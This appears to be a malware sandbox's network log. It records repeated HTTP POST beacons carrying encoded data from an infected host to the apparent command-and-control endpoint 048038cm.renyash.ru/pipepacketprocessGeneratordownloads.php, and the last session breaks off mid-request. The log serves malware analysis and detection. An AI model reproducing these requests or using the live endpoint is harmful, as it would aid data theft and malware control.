                                                                        Date: Sat, 28 Dec 2024 19:44:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRuPW5I4zbN2Q1y58wbeHFEJgHP6xdFv%2FmCFKOvvepcf2wU9Cg5Zr10D1aVafuqxdhw6CZk96thyJGJQftsT9Le8gSft15lcDoG56YbEaSw1SkVJQzB3SQopCLSP8XeprDY3a8SH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b471ad03300-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4608&min_rtt=2092&rtt_var=5817&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=65700&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        56 | 192.168.2.4 | 49949 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:17.133306026 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2576
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:17.485553026 CET | 2576 | OUT | Data Raw: 53 56 5c 54 56 44 55 58 5d 5f 52 56 5a 58 58 5c 57 51 5f 50 54 51 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SV\TVDUX]_RVZXX\WQ_PTQUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^(,%_5+<45<X884#X:*.;P":?U>?:_ !;^=<%\ ![(
                                                                        Dec 28, 2024 20:44:17.532318115 CET | 1236 | OUT | Data Raw: 05 05 27 1a 0e 2c 14 06 3b 5c 10 51 31 01 06 2d 21 03 06 15 38 30 06 33 30 35 21 00 3a 31 26 25 0e 28 54 2d 38 3f 32 28 38 23 14 06 32 07 22 22 27 31 47 20 09 15 22 27 0c 04 01 55 3a 01 04 2f 07 09 3b 1e 0c 23 37 0d 01 04 5f 1c 3d 28 2b 2f 37 37
                                                                        Data Ascii: ',;\Q1-!80305!:1&%(T-8?2(8#2""'1G "'U:/;#7_=(+/77>/0S21+?;;1>^&83;""(=<()":X!9X>!>78?P4;9',%41>58=>=8*;80&_2#_\52>"54+G./,#3=$7]P5=Y4)>#_0\$U:*3?+*)".R;/,Y
                                                                        Dec 28, 2024 20:44:18.767355919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:19.015718937 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UpoVT6Mo%2BGLgDmYu5370WnjJEhYctKm45o0U1wWBKuXRSofFsbbVb6zNATaXpwoMHEgzD6VpGvvrVm1K%2Bi4GlclJkRkFmNRBI05SbX%2FJHgsAxfSUuBbGt3oBOob62bkidva66TUy"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b544eaa422d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4587&min_rtt=1790&rtt_var=6266&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2882&delivery_rate=60407&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        57 | 192.168.2.4 | 49955 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:19.271469116 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:19.626149893 CET | 2584 | OUT | Data Raw: 56 50 59 56 53 44 55 58 5d 5f 52 56 5a 5d 58 58 57 58 5f 5e 54 54 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYVSDUX]_RVZ]XXWX_^TTUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X)<-!];"%+,4=-*=/U 7=<3._<## *<%\ ![(3
                                                                        Dec 28, 2024 20:44:20.402528048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:20.648243904 CET | 805 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a3HwaPOkA59XwzgRxQEVLUXXGMHekrSbJk17iR8MHa3945D%2FoCvfzdO3oy0n%2F6wGyacWbVV2PXV6wp00GDRqJu2KNRhGZIAoxrS%2FMJunQYYBxUmI0n3WZG3UroB0bclgSrQnEJVv"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b5e9872f793-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7704&min_rtt=1492&rtt_var=12984&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=28520&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        58 | 192.168.2.4 | 49959 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:20.940783024 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:21.297993898 CET | 2584 | OUT | Data Raw: 56 5a 5c 55 56 48 55 5c 5d 5f 52 56 5a 5c 58 5f 57 5c 5f 50 54 50 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZ\UVHU\]_RVZ\X_W\_PTPUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y(/9\ ; ;-+7>"\>=34:7T*/9*86#/^*<%\ ![(7
                                                                        Dec 28, 2024 20:44:22.071388006 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:22.315793991 CET | 802 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=INjubFSU5rNX7HdRkugvzZj98DCndO2z3MIrjEt8bISb0PBfdMA7mRVCSIacTnJMNvyHvzU3WfKN%2FSw9AuvBJhFdPGfuvqlEotXxfCumTpvGqDHHMmShQCUU4nbvZYhzho2Zo%2ByW"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b690a704240-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4388&min_rtt=1657&rtt_var=6083&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=62114&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        59 | 192.168.2.4 | 49963 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:22.563133001 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:22.907387018 CET | 2584 | OUT | Data Raw: 56 56 5c 55 56 49 50 53 5d 5f 52 56 5a 5b 58 5d 57 5e 5f 50 54 51 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VV\UVIPS]_RVZ[X]W^_PTQUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+/1_"]+ %,;/#-9=[<49+V*#X950=<%\ ![(+
                                                                        Dec 28, 2024 20:44:23.649723053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:23.896797895 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cjj0WNPpdC2UdYVWQMFRwXlnRpcB8Hju8LOJLyD67dzbvvkcf60%2FytmKJL7DKX1Y3Kf7M89iVi%2F6PJqOIx9kv1M0AW%2FCocxKUyXKrRFQblP3XxeNenqt1cdXqJk3Q2Wnj4uGVKfi"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b72df7542ac-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4445&min_rtt=1735&rtt_var=6071&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=62345&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        60 | 192.168.2.4 | 49968 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:24.140518904 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:24.485507011 CET | 2580 | OUT | Data Raw: 53 55 59 51 53 46 50 5e 5d 5f 52 56 5a 58 58 5a 57 5f 5f 5e 54 51 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SUYQSFP^]_RVZXXZW__^TQUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'<"!#%/,8/7-+>049'Q=</Y9#63_><%\ ![(?
                                                                        Dec 28, 2024 20:44:25.224467993 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:25.458585024 CET | 805 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHMQv1aFUWueQKqBW8vi%2BVMFdl4pCJYUDap53ltJ31eKo84E%2FTnokuoTTzj9PRuO8aOGguiaKRjMn2Tah5w3oHwxvE7p6pOe%2BDfauePoVovRfTeWQ2J5F6SuyZCMl7MQwmqX4zwU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b7cbfbdde97-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6542&min_rtt=1499&rtt_var=10649&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=34887&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        61 | 192.168.2.4 | 49973 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:25.698040962 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:26.048006058 CET | 2584 | OUT | Data Raw: 53 52 59 53 56 40 50 5b 5d 5f 52 56 5a 5c 58 5b 57 5c 5f 5d 54 51 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SRYSV@P[]_RVZ\X[W\_]TQUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_)/. ;'#4//4.*-,#93) :'"33[=%\ ![(7
                                                                        Dec 28, 2024 20:44:26.878330946 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:27.133018970 CET | 800 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzD7H7nP9yzgSiffLZs12UDGQNVf099hCCvq0lu0l8mFRptWtCu4EXVTRwcRi3kP5G6Fl0Wns9kuAz9aoDnxz7CJ8bHWB6xMzmslxq4YyVRt6pDII2Amz8PqSMI3IxvUfkbqLpjY"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b86fed62394-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10459&min_rtt=2005&rtt_var=17661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=20964&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        62 | 192.168.2.4 | 49978 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:27.372211933 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:27.719875097 CET | 2584 | OUT | Data Raw: 53 51 59 54 56 42 50 5e 5d 5f 52 56 5a 5e 58 58 57 5e 5f 58 54 53 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SQYTVBP^]_RVZ^XXW^_XTSUFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+?!!+< ,++]#>2*=?V#94(/::#"#/^(<%\ ![(?
                                                                        Dec 28, 2024 20:44:28.738899946 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:28.750888109 CET | 806 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwc%2Fe8b6ueHOutuilA4XX9bn0ZsGjl0uMi0GARFye7%2FxztHKhxhox%2FWul0E5rgK%2BHl71asQiYuoRre3l5UvTTnOnFPTRLnYMdkTDalNAeM5DnnNxZvTFLWzDKonheb8h18xXoCSo"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b9129d272ab-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6566&min_rtt=1977&rtt_var=9920&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=37732&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        63 | 192.168.2.4 | 49981 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:28.994935989 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:29.344887972 CET | 2580 | OUT | Data Raw: 56 52 5c 54 56 42 50 5e 5d 5f 52 56 5a 58 58 58 57 51 5f 50 54 57 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VR\TVBP^]_RVZXXXWQ_PTWUCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z?)^ ($Z#6(,8#[ X2=>$")7Q(?#Y-+"V?=%\ ![(7
                                                                        Dec 28, 2024 20:44:30.126019955 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:30.368010998 CET | 806 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aabH48B0yAurF4E4YSnFA2Q5mD1ujx9XshaloKwcXyM5hRiukpj6R40UdhYxXTsI%2B2H701LnJZNMTaPsGcO0Rin5b%2FNBBojppHz3nsidQiu6w1SqMQHvPflob%2FcFCpu5%2FdV95VYy"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b9b497a1a13-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4846&min_rtt=1890&rtt_var=6622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=57154&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        64 | 192.168.2.4 | 49987 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:30.606257915 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:30.954812050 CET | 2584 | OUT | Data Raw: 56 5a 59 57 53 44 50 53 5d 5f 52 56 5a 5f 58 55 57 58 5f 5a 54 50 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZYWSDPS]_RVZ_XUWX_ZTPUDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z+/%^"+Z4[,+47"]*[#W#?)/:_#\50/*<%\ ![(
                                                                        Dec 28, 2024 20:44:31.784794092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:32.037031889 CET | 800 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXHkPF9yE6oQYTJyBm272ANivAJMCOwnk0AJHiFzOHhn5Qg0JQkC2cZgiKukxGuB00qLg8hfTMYWFpMwIXMuKfKLBRH%2FXoQcCCklDtOMK2yVkI86ZGnE73MpHJPAON0vkNrS6RAm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ba5ac2fde9a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4866&min_rtt=2290&rtt_var=6011&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=63752&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        65 | 192.168.2.4 | 49991 | 104.21.38.84 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:44:32.319562912 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
